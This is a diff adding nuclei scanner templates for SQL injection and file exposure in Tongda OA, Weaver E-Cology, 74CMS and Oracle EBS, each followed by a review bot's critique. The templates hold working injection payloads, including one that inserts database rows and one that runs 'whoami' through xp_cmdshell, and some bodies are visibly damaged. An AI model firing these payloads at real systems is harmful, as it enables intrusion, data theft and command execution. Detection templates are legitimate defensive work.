+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))>128,1,710)))# =1&_SERVER=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header_1
+        words:
+          - "PHPSESSID="
+          - "register_for/?rid="
+        condition: and
+
+      - type: word
+        part: header_2
+        words:
+          - "register_for/?rid="
+        negative: true
+
+# digest: 4b0a004830460221009ed8e040f9c911e7b4528b68de3d737caf0324411add23a0bf7b5f4313090f09022100c70aafde7c380998799b974261723a1c4a1247cdbb59b5dd156e249be7af06ee:922c64590222798bb761d5b6d8e72950
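Review bot: The `description` does not say that the check has a side effect: request 1 is built so the injected expression succeeds, and the matcher confirms that by the `register_for/?rid=` redirect, which means a record is inserted through `recv/register/insert` on every vulnerable target. `intrusive` is set in `tags`, which is right, but operators reading `description` should see it too, e.g. `This check inserts a document-register record on vulnerable hosts; expect leftover data.` The two requests differ only in `<128` versus `>128` inside the injected `if(...)`; a one-line comment naming that as the true/false pair of a boolean-based check would make the `header_2` negative matcher easier to review.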
diff --git a/poc/sql/tongda-report-func-sqli.yaml b/poc/sql/tongda-report-func-sqli.yaml
new file mode 100755
index 0000000000..8b346b2340
--- /dev/null
+++ b/poc/sql/tongda-report-func-sqli.yaml
@@ -0,0 +1,39 @@
+id: tongda-report-func-sqli
+
+info:
+  name: Tongda OA v11.6 report_bi.func.php - SQL injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    Tongda OA v11.6 report_bi.func.php has a SQL injection vulnerability, and attackers can obtain database information through the vulnerability.
+  reference:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20report_bi.func.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="TDXK-通达OA"
+  tags: tongda,sqli
+
+http:
+  - raw:
+      - |
+        POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"root@'
+          - '"para":'
+          - '"td_oa"'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4a0a0047304502202623ac67b5c9288c847a41c8d90dbd04d224ed78715cc2a7ab9efd4890d6f9bd022100d63e3e11d77b2dfa8cfe2eede3fa56019d78cc62312fac8445b11e6bfa15c563:922c64590222798bb761d5b6d8e72950
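Review bot: The matcher requires `"root@`, `"para":` and `"td_oa"` with `condition: and`, so a finding is reported only when the application connects as `root` and the database is named `td_oa`; on any other deployment the same injection goes unreported, and a negative result must not be read as "not vulnerable". This deserves a comment on the matcher, e.g. `# matches the default Tongda DB user and schema name; other deployments yield a negative even when injectable`, or a sentence in `description`. `classification` and `remediation` are absent, as in the other Tongda templates in this commit.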
diff --git a/poc/sql/weaver-checkserver-sqli.yaml b/poc/sql/weaver-checkserver-sqli.yaml
new file mode 100644
index 0000000000..3610ea5855
--- /dev/null
+++ b/poc/sql/weaver-checkserver-sqli.yaml
@@ -0,0 +1,32 @@
+id: weaver-checkserver-sqli
+
+info:
+  name: Ecology OA CheckServer - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    Ecology OA system improperly filters incoming data from users, resulting in a SQL injection vulnerability. Remote and unauthenticated attackers can use this vulnerability to conduct SQL injection attacks and steal sensitive database information.
+  reference:
+    - https://stack.chaitin.com/techblog/detail?id=81
+    - https://github.com/lal0ne/vulnerability/blob/main/%E6%B3%9B%E5%BE%AE/E-Cology/CheckServer/README.md
+    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-ecology-oa-plugin-checkserver-setting-sqli.yaml
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="泛微-协同办公OA"
+  tags: weaver,ecology,sqli
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/mobile/plugin/CheckServer.jsp?type=mobileSetting"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains_all(header, 'application/json','ecology_')"
+          - "contains(body, 'error\":\"system error') && !contains(body, 'securityIntercept')"
+        condition: and
+
+# digest: 4a0a0047304502203971c4e5664482479370bb1b1f56e4615b5a7d7b64f74ea6104ba1161c63cc3e022100c1e6508ec3615a4313c8cf683984d8424cd47b0d3b340e04a0e81cb5f713e4cf:922c64590222798bb761d5b6d8e72950
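Review bot: The request on L977 carries no SQL payload at all — it only sends `type=mobileSetting` — while the DSL on L984 treats a generic `"error":"system error"` JSON body that lacks the string `securityIntercept` as proof of SQL injection. That is an inference about patch level, not an observation of injected SQL executing, so it cannot separate a vulnerable build from any other backend error on a build without the interceptor, and it misses builds whose error text differs. Either inject into `type` with a deterministic oracle (boolean or time-based, as `ecology-oa-file-sqli` in this commit does), or state in the description that the template only infers exposure from the absence of the `securityIntercept` marker.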
diff --git a/poc/sql/weaver-ecology-getsqldata-sqli.yaml b/poc/sql/weaver-ecology-getsqldata-sqli.yaml
new file mode 100755
index 0000000000..e187956800
--- /dev/null
+++ b/poc/sql/weaver-ecology-getsqldata-sqli.yaml
@@ -0,0 +1,40 @@
+id: weaver-ecology-getsqldata-sqli
+
+info:
+  name: Weaver E-Cology `getsqldata` - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    When the getSqlData interface of the Panwei e-cology OA system uses the mssql database, the built-in SQL statements are not spliced strictly, resulting in a SQL injection vulnerability.
+  reference:
+    - https://github.com/Wrin9/weaverOA_sql_RCE/blob/14cca7a6da7a4a81e7c7a7016cb0da75b8b290bc/weaverOA_sql_injection_POC_EXP.py#L46
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,weaver,oa,sqli
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql="
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: word
+        part: body
+        words:
+          - '{"api_status":'
+          - '"status":true}'
+        condition: and
+
+# digest: 490a00463044022030ad64fd9961684672663bf926bddb0391c94c7fdc8811b4fade9b5f2a1f908b022006c35ef700880eefd6d5e1e757558e4ca0cb156164165191be70c8bec7479fdf:922c64590222798bb761d5b6d8e72950
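Review bot: The second path on L1017 sends an empty `sql=` and the matcher on L1026–L1031 accepts any `{"api_status": … "status":true}` response; because no `matchers-condition` is set the matchers are OR'd, so a reachable endpoint that answers an empty query with `status:true` is reported as a SQL-injection hit without any SQL having been executed. With `stop-at-first-match: true` the MD5 oracle on L1016 is tried first, which is good, but a fallback hit is indistinguishable in the output. Give the matchers `name: sql-executed` and `name: endpoint-exposed` so results can be triaged, or drop the fallback and keep only the oracle. I am assuming from the description that `"status":true` is also returned for an empty statement; if the endpoint errors on empty input the fallback is simply dead code.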
diff --git a/poc/sql/weaver-ecology-hrmcareer-sqli.yaml b/poc/sql/weaver-ecology-hrmcareer-sqli.yaml
new file mode 100755
index 0000000000..92cef0c85e
--- /dev/null
+++ b/poc/sql/weaver-ecology-hrmcareer-sqli.yaml
@@ -0,0 +1,36 @@
+id: weaver-ecology-hrmcareer-sqli
+
+info:
+  name: Weaver E-Cology HrmCareerApplyPerView - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    There is a SQL injection vulnerability in the HrmCareerApplyPerView.jsp file of Panwei OA E-Cology. An attacker can obtain sensitive files in the server database through the vulnerability.
+  reference:
+    - https://github.com/ibaiw/2023Hvv/blob/556de69ffc370fd9827e2cf5027373543e2513d4/%E6%B3%9B%E5%BE%AE%20HrmCareerApplyPerView%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md?plain=1#L3
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,weaver,oa,sqli
+variables:
+  num: "999999999"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','{{num}}')),4,5,6,7"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4a0a004730450221008a69da6dd9b0443019eb595747f9261d574b5a66de842c6185e142a5283fac49022003c7581a2daeebea8bd4eb05c1fc91f8676c9a2a46da1bc7b1e0717fa27fbca8:922c64590222798bb761d5b6d8e72950
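Review bot: The oracle on L1062 relies on `sys.fn_sqlvarbasetostr` and `HashBytes`, which exist only on SQL Server, yet neither the name nor the description says the check is MSSQL-specific — the sibling `weaver-ecology-getsqldata-sqli` in this commit does state that precondition. If an E-Cology instance on another database is in scope (the product supports more than one backend, which I cannot confirm from here), the union query errors and the template reports clean even though the parameter may still be injectable. Add `Only applies to MSSQL-backed deployments; other backends need a different oracle.` to the description. The phrase `obtain sensitive files in the server database` on L1047 should also read `obtain sensitive data from the database`.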
diff --git a/poc/sql/weaver-mysql-config-info-leak.yaml b/poc/sql/weaver-mysql-config-info-leak.yaml
new file mode 100644
index 0000000000..85dad0d119
--- /dev/null
+++ b/poc/sql/weaver-mysql-config-info-leak.yaml
@@ -0,0 +1,30 @@
+id: weaver-mysql-config-exposure
+
+info:
+  name: OA E-Office mysql_config.ini - Information Disclosure
+  author: SleepingBag945
+  severity: high
+  description: |
+    E-Office mysql_config.ini file can be directly accessed, leaking database account password and other information
+  reference:
+    - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA%20E-Office%20mysql_config.ini%20%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="泛微-EOffice"
+  tags: ecology,weaver,oa,lfi
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/mysql_config.ini"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(header,"text/plain")'
+          - 'contains_all(body,"datapassword", "datauser")'
+        condition: and
+
+# digest: 4a0a00473045022003d14acb438bcd3ddfaab392c67ae2d0fd30ddbe80da964d403b0403eee025dd022100d6c9d8d5b6864cd317a1b28d3c9a5eeb35e4a0bbfb64a43f01c526d2a5e63070:922c64590222798bb761d5b6d8e72950
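Review bot: The `tags` on L1096 classify this as `lfi` and `ecology`, but the request on L1101 is a plain GET for an exposed config file on E-Office — not a local-file-inclusion bug and not the E-Cology product the `fofa-query` on L1095 already contradicts. Mis-tagging matters for operators who select templates by tag; `tags: weaver,eoffice,exposure,config` describes what the template actually finds. The `contains(header,"text/plain")` clause on L1107 will also miss a server that hands out `.ini` files as `application/octet-stream`; since L1108 already requires both `datapassword` and `datauser` in the body, the content-type check adds little and could be relaxed to a negative `text/html` check.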
diff --git a/poc/sql_injection/74cms-weixin-sqli.yaml b/poc/sql_injection/74cms-weixin-sqli.yaml
new file mode 100644
index 0000000000..6508ef3296
--- /dev/null
+++ b/poc/sql_injection/74cms-weixin-sqli.yaml
@@ -0,0 +1,39 @@
+id: 74cms-weixin-sqli
+
+info:
+  name: 74CMS weixin.php - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    There is a libxml_disable_entity_loader function to prevent XML eXternal Entity Injection, but this function needs to be customized by the user. If the user does not customize it, there will be no filtering, which leads to SQL injection vulnerabilities.
+  reference:
+    - https://cn-sec.com/archives/25900.html
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="骑士-74CMS"
+  tags: 74cms,weixin,sqli
+variables:
+  num: '999999999'
+
+http:
+  - raw:
+      - |
+        POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709×tamp=&nonce= HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        ]>&test;111112331%' union select md5({{num}})#
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4b0a00483046022100cea2e8608523d9fe561e07db80006e0d8180bb73866ce3ee77dcdbcbd911aa6002210095f263df205d9637e3943b658e48c91bcffd1e723ed3809ccd177d9283fab7f4:922c64590222798bb761d5b6d8e72950
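Review bot: As rendered, the request body on L1143 consists only of `]>&test;111112331%' union select md5({{num}})#` — the XML prolog, the DOCTYPE declaring the `test` entity that `&test;` refers to, and the enclosing message elements are not visible, and `×tamp=` on L1139 appears where `&timestamp=` should be. If the committed file really looks like this the body is not well-formed XML, the entity never expands and the template cannot match; if this is only display damage, please confirm against the raw file. The description on L1125 is also misleading: it discusses `libxml_disable_entity_loader` and XXE and then concludes SQL injection without explaining the link. A clearer wording, based on my reading of the referenced write-up, is `weixin.php parses attacker-supplied XML; an internal entity is used to smuggle a single quote past input filtering into a SQL query built from the message fields.`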
diff --git a/poc/sql_injection/SQLNet-log.yaml b/poc/sql_injection/SQLNet-log.yaml
new file mode 100644
index 0000000000..edccf5de42
--- /dev/null
+++ b/poc/sql_injection/SQLNet-log.yaml
@@ -0,0 +1,18 @@
+id: sqlnet-log
+
+info:
+  name: sqlnet-log 
+  author: 111xnagashy
+  severity: medium
+  description: internal pages did not enforce an authentication requirement. The log file at /OA_HTML/bin/sqlnet.log disclosed internal Uber IP addresses, hostnames, and one internal username.
+  reference: https://hackerone.com/reports/410187
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/OA_HTML/bin/sqlnet.log"
+    matchers:
+      - type: word
+        words:
+          - "ORA-"
+          - "SQL*Net"
\ No newline at end of file
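Review bot: The matcher block on L1176–L1180 has no `condition`, so a response containing just `ORA-` anywhere — a generic Oracle error page, for instance — satisfies it, and there is no status check at all; the template also uses the legacy `requests:` key on L1172 rather than the `http:` key every other file in this commit uses, has no `tags`, and its description on L1169 repeats the HackerOne report's `Uber` wording as if it were a property of the template. Require both words and a 200, add tags such as `oracle,ebs,exposure,logs`, and describe the issue generically, e.g. `Oracle E-Business Suite exposes /OA_HTML/bin/sqlnet.log without authentication; the log reveals internal IP addresses, hostnames and usernames.`

```yaml
http:
  # … unchanged: GET {{BaseURL}}/OA_HTML/bin/sqlnet.log …

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "ORA-"
          - "SQL*Net"
        condition: and

      - type: status
        status:
          - 200
```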
diff --git a/poc/sql_injection/ecology-oa-file-sqli.yaml b/poc/sql_injection/ecology-oa-file-sqli.yaml
new file mode 100644
index 0000000000..663a02fd95
--- /dev/null
+++ b/poc/sql_injection/ecology-oa-file-sqli.yaml
@@ -0,0 +1,43 @@
+id: ecology-oa-file-sqli
+
+info:
+  name: E-cology FileDownloadForOutDocSQL - SQL Injection
+  author: momika233
+  severity: high
+  description: |
+    e-cology did not effectively filter the user input, but directly spliced it into the SQL query statement, resulting in SQL injection vulnerabilities in the system
+  reference:
+    - https://github.com/TgHook/Vulnerability-Wiki/blob/master/docs-base/docs/oa/%E6%B3%9B%E5%BE%AEOA%20e-cology%20FileDownloadForOutDoc%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: ecology_JSessionid
+    fofa-query: app="泛微-协同办公OA"
+  tags: ecology,ecology-oa,sqli
+
+http:
+  - raw:
+      - |
+        @timeout: 15s
+        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
+        Host: {{Hostname}}
+
+        isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:7'
+      - |
+        @timeout: 35s
+        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
+        Host: {{Hostname}}
+
+        isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:15'
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration_1>=7 && status_code_1 == 200'
+          - 'contains(header_1, "ecology_JSessionid=")'
+          - 'duration_2>=15 && status_code_2 == 200'
+          - 'contains(header_2, "ecology_JSessionid=")'
+        condition: and
+
+# digest: 4b0a00483046022100ffe0b0bbdd67b8d72070bd4b0ebcbd93eaed08be7e825664b654c76340c93303022100d0dda143a17d2ccd9570880ebb09784be05f7e5862ad9ed5b60ea6ea2c7e9a15:922c64590222798bb761d5b6d8e72950
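Review bot: Both raw POSTs on L1209–L1218 send a form body without a `Content-Type: application/x-www-form-urlencoded` header; servlet containers generally parse request parameters from a body only when it is declared form-encoded, so unless nuclei inserts that header for raw requests (I could not confirm that it does), `fileid` may never reach the query and the delay oracle never triggers despite `verified: true`. Adding the header line after `Host: {{Hostname}}` in both requests is cheap and removes the doubt. Separately, `fileid=%d+WAITFOR+…` looks like a leftover `%d` printf placeholder from the referenced Python PoC rather than a deliberate value; if it is intentional (for example to defeat a numeric check) a comment should say so, otherwise a numeric id such as `fileid=1+WAITFOR+DELAY+'0:0:7'` is what the injection actually needs.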
diff --git a/poc/sql_injection/ecology-sqli2.yaml b/poc/sql_injection/ecology-sqli2.yaml
index eb07a123e2..37e6ab9baf 100644
--- a/poc/sql_injection/ecology-sqli2.yaml
+++ b/poc/sql_injection/ecology-sqli2.yaml
@@ -10,7 +10,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=Select%20*%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27"
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=exec%20xp_cmd$shell%20%27whoami%27;"
     matchers-condition: and
     matchers:
       - type: status
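Review bot: The new payload on L1240 swaps a read-only `SELECT` for `exec xp_cmd$shell 'whoami'`, which executes an operating-system command on the database host, yet the template is still presented as a detection check with no `intrusive` tag and the legacy `requests:` key on L1236. Two things need settling: `xp_cmd$shell` is not the same identifier as `xp_cmdshell` in T-SQL (`$` is a legal identifier character), so either something in the request path strips the `$` — in which case a comment should explain the bypass — or the procedure call fails and the template never matches. If command execution is really wanted, tag it `intrusive` and say so in the description; for detection, a read-only oracle such as `sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)` as used by `weaver-ecology-getsqldata-sqli` in this same commit is enough. The enclosing `requests` block starts before this hunk.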
@@ -18,7 +18,7 @@ requests:
           - 200
       - type: word
         words:
-          - "lastname"
-          - "password"
+          - "output"
+          - "mssqlserver"
         part: body
         condition: and
\ No newline at end of file
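Review bot: The replacement words on L1250–L1251 require `mssqlserver` in the body, i.e. they assume the SQL Server service runs as the default `NT Service\MSSQLSERVER` account; a named instance, a domain service account or a virtual account yields a different `whoami` and the template reports clean even though the command ran. Matching on command output is inherently environment-dependent; an oracle the template controls (an `md5`/`hashbytes` value as in the sibling templates) is deterministic and avoids the problem. The matcher list and its `condition: and` continue from the previous hunk.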
diff --git a/poc/sql_injection/mysql-history.yaml b/poc/sql_injection/mysql-history.yaml
new file mode 100644
index 0000000000..3842f59d4e
--- /dev/null
+++ b/poc/sql_injection/mysql-history.yaml
@@ -0,0 +1,54 @@
+id: mysql-history
+
+info:
+  name: Mysql History - File Disclosure
+  author: kazet
+  severity: low
+  description: |
+    The mysql_history file is a history file used by the MySQL command-line client (mysql) to store a record of the SQL commands and statements entered by a user during their interactive MySQL sessions. It serves as a command history for the MySQL client, allowing users to recall and reuse previously executed SQL commands.
+  reference:
+    - http://doc.docs.sk/mysql-refman-5.5/mysql-history-file.html
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"mysql_history"
+  tags: misconfig,disclosure,config
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.mysql_history"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "_HiStOrY_V2_"
+          - "show databases;"
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+          - "text/plain"
+          - "filename=\".mysql_"
+
+      - type: word
+        part: response
+        words:
+          - ""
+          - "text/html"
+          - "image/"
+        negative: true
+
+      - type: status
+        status:
+          - 200
+
+# digest: 490a0046304402204a3e73fd4764e2ab60a4edeb79644228fa98d42ac7ccea958bde5dd4a124fbeb02201f70da8af717f2a5d68b47ecbcddc16b8692f9d3e8821a28cdf3f0db6dfe46b6:922c64590222798bb761d5b6d8e72950
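Review bot: The negative word matcher on L1297–L1303 lists an empty string `""` as its first word; an empty substring is contained in every response, so as rendered the negative matcher always fails and the template can never report a hit. This is most likely an HTML-tag literal (something like `<html`) that the rendering stripped — please confirm the committed file, and if the value really is empty replace it with `'<html'` (quoted so YAML keeps the angle bracket). The `part: response` on L1298 also means `text/html` and `image/` are searched in the body as well as the headers, which is probably intended but deserves a one-line comment since the positive matcher on L1290–L1295 is scoped to `header`.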
diff --git a/poc/sql_injection/sql-server-report-viewer.yaml b/poc/sql_injection/sql-server-report-viewer.yaml
index 25d0450675..0cb1bc83ab 100644
--- a/poc/sql_injection/sql-server-report-viewer.yaml
+++ b/poc/sql_injection/sql-server-report-viewer.yaml
@@ -4,6 +4,7 @@ info:
   name: SQL Server ReportViewer - Exposure
   author: kazet
   severity: high
+  description: SQL Server ReportViewer page exposed.
   reference:
     - https://learn.microsoft.com/en-us/sql/reporting-services/create-deploy-and-manage-mobile-and-paginated-reports?view=sql-server-ver16
   metadata:
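Review bot: The description added on L1318, `SQL Server ReportViewer page exposed.`, restates the name and does not tell a triager what the exposure means or why `severity: high` is justified. Say what the matcher actually proves, e.g. `The SQL Server Reporting Services ReportViewer page is reachable without authentication (the second request does not return 401) and discloses data-source details, allowing unauthenticated users to browse reports and connection metadata.` The matchers this refers to are outside this hunk.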
@@ -27,5 +28,4 @@ http:
           - "status_code_1 == 200 && status_code_2 != 401"
           - "contains(body, 'Data Source') && contains(body, 'SQL Server Reporting Services')"
         condition: and
-
-# digest: 4b0a00483046022100b740eed8d4c009932dfa1f7cf3eb572e3163d7148296a2a206ea39e0645f1995022100d56aff517c589016472e1ef042f9d557172d13012341acc2dc483910ec6e427b:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a004830460221008feccb6f64b565bdc0c250a76bf836e3fa99a59c5a9b7f80327b4f4628fdeaa60221008a23345dd57c7dbbce3370ad35499b7aaf50fe496815d0d9c30740b73e81bccf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/sql_injection/tongda-insert-sqli.yaml b/poc/sql_injection/tongda-insert-sqli.yaml
new file mode 100755
index 0000000000..c963fa5a5b
--- /dev/null
+++ b/poc/sql_injection/tongda-insert-sqli.yaml
@@ -0,0 +1,47 @@
+id: tongda-insert-sqli
+
+info:
+  name: Tongda OA v11.6 Insert Parameter - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    Tongda OA v11.6 insert parameters contain SQL injection vulnerabilities, through which attackers can obtain sensitive database information
+  reference:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 2
+    fofa-query: app="TDXK-通达OA"
+  tags: tongda,sqli,intrusive
+
+http:
+  - raw:
+      - |
+        POST /general/document/index.php/recv/register/insert HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
+      - |
+        POST /general/document/index.php/recv/register/insert HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))>128,1,710)))# =1&_SERVER=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header_1
+        words:
+          - "PHPSESSID="
+          - "register_for/?rid="
+        condition: and
+
+      - type: word
+        part: header_2
+        words:
+          - "register_for/?rid="
+        negative: true
+
+# digest: 4b0a004830460221009ed8e040f9c911e7b4528b68de3d737caf0324411add23a0bf7b5f4313090f09022100c70aafde7c380998799b974261723a1c4a1247cdbb59b5dd156e249be7af06ee:922c64590222798bb761d5b6d8e72950
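Review bot: The first request on L1359 is built to succeed — `title)values("'"^exp(if(…<128,1,710)))#` evaluates `exp(1)`, the INSERT completes and the redirect to `register_for/?rid=` is what L1370–L1374 look for — which means every scan leaves a junk document-registration row in the target database. The `intrusive` tag on L1350 acknowledges this, but the description on L1343 does not; add `Each run inserts a dummy record via /recv/register/insert; remove it after testing.` so operators know what to clean up. I could not tell from the referenced PoC whether a variant that errors in both branches (differing only in error type) is observable, which would avoid the write entirely.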
diff --git a/poc/sql_injection/tongda-report-func-sqli.yaml b/poc/sql_injection/tongda-report-func-sqli.yaml
new file mode 100755
index 0000000000..8b346b2340
--- /dev/null
+++ b/poc/sql_injection/tongda-report-func-sqli.yaml
@@ -0,0 +1,39 @@
+id: tongda-report-func-sqli
+
+info:
+  name: Tongda OA v11.6 report_bi.func.php - SQL injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    Tongda OA v11.6 report_bi.func.php has a SQL injection vulnerability, and attackers can obtain database information through the vulnerability.
+  reference:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20report_bi.func.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="TDXK-通达OA"
+  tags: tongda,sqli
+
+http:
+  - raw:
+      - |
+        POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"root@'
+          - '"para":'
+          - '"td_oa"'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# digest: 4a0a0047304502202623ac67b5c9288c847a41c8d90dbd04d224ed78715cc2a7ab9efd4890d6f9bd022100d63e3e11d77b2dfa8cfe2eede3fa56019d78cc62312fac8445b11e6bfa15c563:922c64590222798bb761d5b6d8e72950
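Review bot: This file is byte-identical (same `id` on L1389, same digest) to `poc/sql/tongda-report-func-sqli.yaml` added earlier in this commit, so the repository now ships the template twice; nuclei keys templates by `id`, and in my experience it logs a duplicate-ID warning and then either skips the second copy or runs the same request twice depending on version. Pick one directory — the other `sql/` and `sql_injection/` pairs in this commit have the same problem — rather than maintaining two copies with two digests. The hard-coded `"root@` assumption in the matcher on L1418 applies here as well.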
diff --git a/poc/sql_injection/weaver-checkserver-sqli.yaml b/poc/sql_injection/weaver-checkserver-sqli.yaml
new file mode 100644
index 0000000000..3610ea5855
--- /dev/null
+++ b/poc/sql_injection/weaver-checkserver-sqli.yaml
@@ -0,0 +1,32 @@
+id: weaver-checkserver-sqli
+
+info:
+  name: Ecology OA CheckServer - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    Ecology OA system improperly filters incoming data from users, resulting in a SQL injection vulnerability. Remote and unauthenticated attackers can use this vulnerability to conduct SQL injection attacks and steal sensitive database information.
+  reference:
+    - https://stack.chaitin.com/techblog/detail?id=81
+    - https://github.com/lal0ne/vulnerability/blob/main/%E6%B3%9B%E5%BE%AE/E-Cology/CheckServer/README.md
+    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-ecology-oa-plugin-checkserver-setting-sqli.yaml
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="泛微-协同办公OA"
+  tags: weaver,ecology,sqli
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/mobile/plugin/CheckServer.jsp?type=mobileSetting"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains_all(header, 'application/json','ecology_')"
+          - "contains(body, 'error\":\"system error') && !contains(body, 'securityIntercept')"
+        condition: and
+
+# digest: 4a0a0047304502203971c4e5664482479370bb1b1f56e4615b5a7d7b64f74ea6104ba1161c63cc3e022100c1e6508ec3615a4313c8cf683984d8424cd47b0d3b340e04a0e81cb5f713e4cf:922c64590222798bb761d5b6d8e72950
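Review bot: The description on L1441 promises that remote, unauthenticated attackers can `steal sensitive database information`, but the single matcher on L1458–L1463 only checks for a `system error` JSON body that lacks the `securityIntercept` string, i.e. the absence of a patch marker. A triager reading a hit will assume injection was demonstrated; add one sentence such as `This template infers exposure from the absence of the securityIntercept response marker and does not execute injected SQL.` and consider reflecting that in `metadata`. This file duplicates `poc/sql/weaver-checkserver-sqli.yaml` from the same commit.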
diff --git a/poc/sql_injection/weaver-ecology-getsqldata-sqli.yaml b/poc/sql_injection/weaver-ecology-getsqldata-sqli.yaml
new file mode 100755
index 0000000000..e187956800
--- /dev/null
+++ b/poc/sql_injection/weaver-ecology-getsqldata-sqli.yaml
@@ -0,0 +1,40 @@
